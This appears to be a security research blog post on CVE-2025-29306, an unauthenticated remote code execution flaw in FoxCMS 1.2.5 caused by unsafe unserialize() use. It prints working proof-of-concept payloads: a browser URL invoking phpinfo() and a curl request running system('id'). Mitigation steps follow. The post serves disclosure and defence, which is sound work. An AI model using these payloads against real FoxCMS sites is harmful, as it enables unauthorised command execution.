Blog

/

CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection

Research & Tutorials

Jul 3, 2025

CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection

Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.

OffSec Team OffSec Team

2 min read

Overview

CVE-2025-29306 is a critical remote code execution (RCE) vulnerability affecting FoxCMS version 1.2.5. The flaw stems from unsafe handling of the id parameter, which is passed directly into PHP’s unserialize() function without validation. Attackers can supply malicious serialized PHP objects that trigger arbitrary command execution via system().

  • CVE ID: CVE-2025-29306
  • Severity: Critical
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • EPSS Score: 71.52%
  • Affected Version: FoxCMS ≤ 1.2.5
  • Patched Version: None released as of writing
  • Authentication Required: No
  • Impact: Remote Code Execution

Technical Breakdown

FoxCMS uses unserialize() directly on user-supplied input from the id parameter. When a malicious serialized PHP object is supplied, FoxCMS inadvertently executes attacker-controlled PHP code.

A typical payload might inject PHP code such as:

${@print_r(@system("id"))}

When deserialized and evaluated, this results in arbitrary OS command execution. This technique is known as PHP Object Injection (POI), leveraging unserialize() as the initial injection vector.


Conditions for Exploitation

  • FoxCMS v1.2.5 installed and publicly reachable
  • No login or authentication required
  • PHP deserialization gadgets available in the environment
  • PHP has shell access (default in many configurations)

Exploitation Steps

To compromise this lab, an attacker crafts a POST request to the vulnerable case display page, injecting PHP code that is subsequently written to a .php file.

Simple Browser PoC

A known exploit simply calls phpinfo(): Replace TARGET with the target’s URL or IP. Visiting the URL reveals full phpinfo output, confirming code execution.

http://TARGET/images/index.html?id=${@print(phpinfo())}

PoC with curl

Swap out phpinfo() for an OS command, e.g. id:

curl "http://TARGET/images/index.html?id=%24%7B%40print%28system%28%22id%22%29%29%7D"

This confirms the vulnerability and demonstrates remote code execution via unserialize-based injection in FoxCMS v1.2.5.


Mitigation

  • No official patch exists yet. Users should:
    • Remove or replace unserialize() usage with safer methods (e.g. JSON decoding)
    • Filter or validate all input parameters
    • Block public access to vulnerable pages
    • Deploy WAF signatures to detect serialized payloads
    • Disable dangerous PHP functions like system() if not needed

References

Stay in the know: Become an OffSec Insider

Stay in the know: Become an OffSec Insider

Get the latest updates about resources, events & promotions from OffSec!

Latest from OffSec